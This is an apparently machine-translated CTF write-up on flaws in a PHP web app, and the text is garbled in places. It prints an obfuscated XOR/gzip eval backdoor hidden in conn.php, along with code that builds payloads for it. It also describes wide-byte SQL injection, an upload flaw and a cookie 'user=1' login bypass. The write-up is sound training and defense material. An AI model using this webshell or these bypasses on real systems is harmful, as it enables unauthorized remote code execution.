0x01 confuse the back door # conn.php
First or drag D Shield scanning
Open conn.php found that a string of code at the bottom:
This code analysis
First, you can compare several simple variable output look
$ s output the contents of create_function
29 row shows the anonymous function calls the $ q code , so we print $ q content look
$ q content is as follows:
$k="5ac91f7d";$kh="b9615a29bc1d";$kf="24d0b67c2c91";$p="9GmIEgwZ7HiEeclS";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if(@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1){@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}
After the code is formatted as follows:
We found through input incoming data, and then need to meet regular and equal before the execution down.
We need to know several functions:
ob_start: php buffered output function
gzcompress: compression function
gzuncompress: decompression functions
ob_get_contents: obtain data buffer
x is a confusion function , specifically, how confusion can never mind.
We just know that 19 line he gave us was base64deco and decompress, then turn base64encode and compressed enough.
For example, we now want to phpinfo (); encryption
Reverse out code is as follows:
<?php
$k="5ac91f7d";
$kh="b9615a29bc1d";
$kf="24d0b67c2c91";
$p="9GmIEgwZ7HiEeclS";
function x($t,$k){
$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++){
$o.=$t{$i}^$k{$j};
}
}return $o;
}
$r=@base64_encode(@x(@gzcompress('phpinfo();'),$k));
echo $r;
String obtained: Tf1I8Rmu + y / + trONN2YioDbg
Finally, with $ kh, $ kf splicing
Obtained b9615a29bc1dTf1I8Rmu + y / + trONN2YioDbg24d0b67c2c91
In this transmission post data packet.
0x03 backstage uploaded back door # up.class.php
The seventh line of code visible php also upload it in the list;
Then take a look at where to call this class
According to Catalog of view are basically background
Reproduction bit environment:
It found that uploading is bad, so the upload function should not work. Only through ueditor that editors upload, so this point can only be said to be void;
0x03 SQL injection # conntent.php
addslashes function that may be bypassed, if at the time the game environment using gbk coding is then injected through a wide byte bypass , and almost all other programs using this function, so the direct search elements addslashes almost all sql injection ;
Injection point very much, I will not write it, because this big program source code;
0x04 permission to bypass # checklogin.php
Him the check is written a little funny.
Judge $ _COOKIE is empty
So long as the request for user field is not empty on the OK of the (x-forwarded-for is I usually like to add, and can be ignored )
#php web 's basic flaw is above, it should be the initial difficulties that PHP confuse it, if you want to repair the Trojans can delete that part, as far as I know, is capable of landing you can get a Flag . Automation is also very simple words, write a script requests the cookie field to fill in user = 1 then the regular extraction flag output to TXT , combined burpsuite automatic submission flag .